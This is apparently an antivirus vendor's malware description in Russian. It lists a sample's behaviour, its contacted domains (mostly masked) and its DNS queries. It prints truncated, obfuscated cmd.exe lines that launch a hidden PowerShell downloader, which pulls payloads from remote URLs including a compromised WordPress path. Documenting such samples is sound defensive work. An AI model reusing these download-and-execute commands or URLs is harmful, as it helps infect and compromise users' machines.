Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set naM6=\+Wsn-HwFu;=d5Rx9%37':}ql8I)rm(vMQazgLfBYSA.ieCEbty~c @_UJ62\0o4$OD,NhpZGjP1Tk{&&for %E in (70;62;7;17;74;56;39;37;26;46;21;51;13;67;75;17;...
Сетевая активность
Подключается к
- 'sc#####shipfinder.ga':80
- 'sh###abz.com':80
- 'mi#####ipi2011.com.br':80
- 'pa####rkamany.ru':80
UDP
- DNS ASK sc#####shipfinder.ga
- DNS ASK sh###abz.com
- DNS ASK kh####c.bluebird.vn
- DNS ASK mi#####ipi2011.com.br
- DNS ASK pa####rkamany.ru
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set naM6=\+Wsn-HwFu;=d5Rx9%37':}ql8I)rm(vMQazgLfBYSA.ieCEbty~c @_UJ62\0o4$OD,NhpZGjP1Tk{&&for %E in (70;62;7;17;74;56;39;37;26;46;21;51;13;67;75;17;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set naM6=\+Wsn-HwFu;=d5Rx9%37':}ql8I)rm(vMQazgLfBYSA.ieCEbty~c @_UJ62/0o4$OD,NhpZGjP1Tk{&&for %E in (70;62;7;17;74;56;39;37;26;46;21;51;13;67;75;17;28;17;41;47;41;41;26;65;68;68;42;32;47;2...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $mlizu='mqji';$dcrh=new-object Net.WebClient;$bisn='http://sc#####shipfinder.ga/J7GiTu9gH1HL_P@http://shopsabz.com/wp-content/...
- '<SYSTEM32>\cmd.exe'
